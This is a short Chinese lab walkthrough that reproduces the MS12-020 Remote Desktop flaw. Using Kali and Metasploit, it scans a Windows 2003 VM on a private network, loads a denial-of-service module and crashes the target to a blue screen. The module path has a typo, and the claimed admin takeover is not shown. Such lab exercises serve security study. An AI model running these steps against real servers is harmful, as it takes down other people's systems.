一、原理

        ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向远程桌面默认端口（3389）发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统。
  根据实际被入侵终端进行分析，开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

二、实验环境

 

攻击机：kali
靶机win2003 ip：192. 168.252.136

两者都在同一内网，采用NAT连接方式

 

三、漏洞复现

1、开启win2003的远程桌面：控制面板-->系统-->远程-->远程协助-->远程桌面

 

2、控制面板-->windows防火墙-->例外-->远程桌面

 3、用nmap扫描靶机，发现靶机的3389端口已经打开

输入：nmap 192.168.252.136

 

 4、在kali的终端中打开msfconsole

 

5、使用search功能搜索ms12-020，发现有两个可用模块。

输入：search ms12-020

 

6、使用第一个可用版模块

输入：use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

 

7、利用set命令设置攻击的IP。

输入：set rhosts 192.168.252.136

          show options

8、输入：exploit，执行攻击

 

9、看一下靶机，发现靶机蓝屏了